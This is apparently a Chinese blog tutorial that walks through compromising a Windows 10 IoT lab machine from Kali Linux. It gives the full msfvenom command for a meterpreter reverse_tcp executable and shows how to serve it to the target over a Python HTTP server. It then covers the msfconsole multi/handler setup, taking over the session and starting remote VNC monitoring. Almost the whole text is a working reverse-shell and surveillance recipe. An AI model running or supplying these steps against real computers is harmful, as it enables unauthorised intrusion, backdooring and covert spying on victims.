一、环境
kali2022.4,靶机环境win10物联网企业版,工具:msfvenom、msfconsole、python3
二、具体步骤
1、管理员权限打开终端

2、生成可执行文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=指定端口 -f exe -o test.exe

3、在目标靶机下载生成的test.exe程序
1)在kali执行python3 -m http.server

2)在目标靶机进行下载

4、执行msfconsole命令

5、配置参数
use exploit/multi/handler(选择模块)
set payload windows/meterpreter/reverse_tcp(选择攻击模块)
set LhOST 本地ip
set lport 指定端口号
show options(查看配置的参数)
exploit -z -j(后台执行)
6、在靶机运行可执行程序test.exe

7、执行sessions查看上钩的用户

8、执行sessions -i 1进行攻击,出现meterpreter说明你就已经成功的入侵的对方的电脑
9、运行run vnc -i进行远程监控靶机


该文介绍了如何在KaliLinux环境下,使用msfvenom生成针对Windows10IoT企业版的恶意可执行文件,通过本地http服务器将其传输到靶机,然后利用msfconsole设置exploit模块,监听并控制靶机,最后通过运行test.exe实现meterpreter会话,以进行远程监控。
2560

被折叠的 条评论
为什么被折叠?



